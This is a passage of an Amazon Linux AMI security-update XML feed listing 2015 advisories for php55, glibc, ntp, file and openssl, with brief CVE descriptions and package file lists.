arch="i686"><filename>Packages/php54-mssql-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.38-1.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-494</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-494: critical priority package update for php55</title><issued date="2015-03-23 08:29:00" /><updated date="2015-03-23 08:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0273:
A use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.
1194730:
CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone
CVE-2015-0235:
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
1183461:
CVE-2015-0235 glibc: __nss_hostname_digits_dots() heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235" title="" id="CVE-2015-0235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273" title="" id="CVE-2015-0273" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pspell" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.22-1.98.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-495</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-495: medium priority package update for glibc</title><issued date="2015-03-23 08:30:00" /><updated date="2015-03-23 08:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8121:
It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service.
1165192:
CVE-2014-8121 glibc: Unexpected closing of nss_files databases after lookups causes denial of service
CVE-2014-6040:
An out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application.
1135841:
CVE-2014-6040 glibc: crash in code page decoding functions (IBM933, IBM935, IBM937, IBM939, IBM1364)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040" title="" id="CVE-2014-6040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8121" title="" id="CVE-2014-8121" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-debuginfo" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.139.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.139.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.139.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.139.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-496</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-496: medium priority package update for ntp</title><issued date="2015-03-23 08:31:00" /><updated date="2015-03-23 08:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9298:
1184572:
CVE-2014-9298 ntp: drop packets with source address ::1
CVE-2014-9297:
1184573:
CVE-2014-9297 ntp: vallen in extension fields are not validated
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9297" title="" id="CVE-2014-9297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9298" title="" id="CVE-2014-9298" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-perl" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-27.23.amzn1.noarch.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-27.23.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-27.23.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-27.23.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-27.23.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-27.23.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-27.23.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="27.23.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-27.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-497</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-497: medium priority package update for file</title><issued date="2015-03-23 08:32:00" /><updated date="2015-03-23 09:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9653:
1190116:
CVE-2014-9653 file: malformed elf file causes access to uninitialized memory
CVE-2014-9621:
The ELF parser in file 5.16 through 5.21 allows remote attackers to cause a denial of service via a long string.
1180642:
CVE-2014-9621 file: limit string printing to 100 chars
CVE-2014-9620:
The ELF parser in file 5.08 through 5.21 allows remote attackers to cause a denial of service via a large number of notes.
1180639:
CVE-2014-9620 file: limit the number of ELF notes processed
CVE-2014-8117:
softmagic.c in file before 5.21 does not properly limit recursion, which allows remote attackers to cause a denial of service (CPU consumption or crash) via unspecified vectors.
1174606:
CVE-2014-8117 file: denial of service issue (resource consumption)
CVE-2014-8116:
The ELF parser (readelf.c) in file before 5.21 allows remote attackers to cause a denial of service (CPU consumption or crash) via a large number of (1) program or (2) section headers or (3) invalid capabilities.
1171580:
CVE-2014-8116 file: multiple denial of service issues (resource consumption)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116" title="" id="CVE-2014-8116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117" title="" id="CVE-2014-8117" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620" title="" id="CVE-2014-9620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621" title="" id="CVE-2014-9621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9653" title="" id="CVE-2014-9653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-devel" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="python26-magic" version="5.22" release="2.29.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.22-2.29.amzn1.noarch.rpm</filename></package><package name="file-debuginfo" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="python27-magic" version="5.22" release="2.29.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.22-2.29.amzn1.noarch.rpm</filename></package><package name="file" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.22" release="2.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.22-2.29.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file-static" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.22-2.29.amzn1.i686.rpm</filename></package><package name="file" version="5.22" release="2.29.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.22-2.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-498</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-498: medium priority package update for openssl</title><issued date="2015-03-23 13:42:00" /><updated date="2015-03-23 13:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0293:
A denial of service flaw was found in the way OpenSSL handled certain SSLv2 messages. A malicious client could send a specially crafted SSLv2 CLIENT-MASTER-KEY message that would cause an OpenSSL server that both supports SSLv2 and enables EXPORT-grade cipher suites to crash.
1202404:
CVE-2015-0293 openssl: assertion failure in SSLv2 servers
CVE-2015-0289:
A null-pointer dereference was found in the way OpenSSL handled certain PKCS#7 blobs. An attacker could cause OpenSSL to crash, when applications verify, decrypt or parsed these ASN.1 encoded PKCS#7 blobs. OpenSSL clients and servers are not affected.
1202384:
CVE-2015-0289 openssl: PKCS7 NULL pointer dereference
CVE-2015-0288:
A NULL pointer dereference flaw was found in OpenSSL's x509 certificate handling implementation. A remote attacker could use this flaw to crash an OpenSSL server using an invalid certificate key.
1202418:
CVE-2015-0288 openssl: X509_to_X509_REQ NULL pointer dereference
CVE-2015-0287:
An out-of-bounds write flaw was found in the way OpenSSL reused certain ASN.1 structures. A remote attacker could use a specially crafted ASN.1 structure that, when parsed by an application, would cause that application to crash.
1202380:
CVE-2015-0287 openssl: ASN.1 structure reuse memory corruption
CVE-2015-0286:
A flaw was found in the the ASN (Abstract Syntax Notation) parsing code of OpenSSL. An attacker could present a specially crafted certificate, which when verified by an OpenSSL client or server could cause it to crash.
1202366:
CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp()
CVE-2015-0209:
A use-after-free flaw was found in the way OpenSSL importrf certain Elliptic Curve private keys. An attacker could use this flaw to crash OpenSSL, if a specially-crafted certificate was imported.
1196737:
CVE-2015-0209 openssl: use-after-free on invalid EC private key import
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209" title="" id="CVE-2015-0209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286" title="" id="CVE-2015-0286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287" title="" id="CVE-2015-0287" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288" title="" id="CVE-2015-0288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289" title="" id="CVE-2015-0289" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293" title="" id="CVE-2015-0293" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-1.84.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.84.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-1.84.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.84.amzn1" epoch="1" 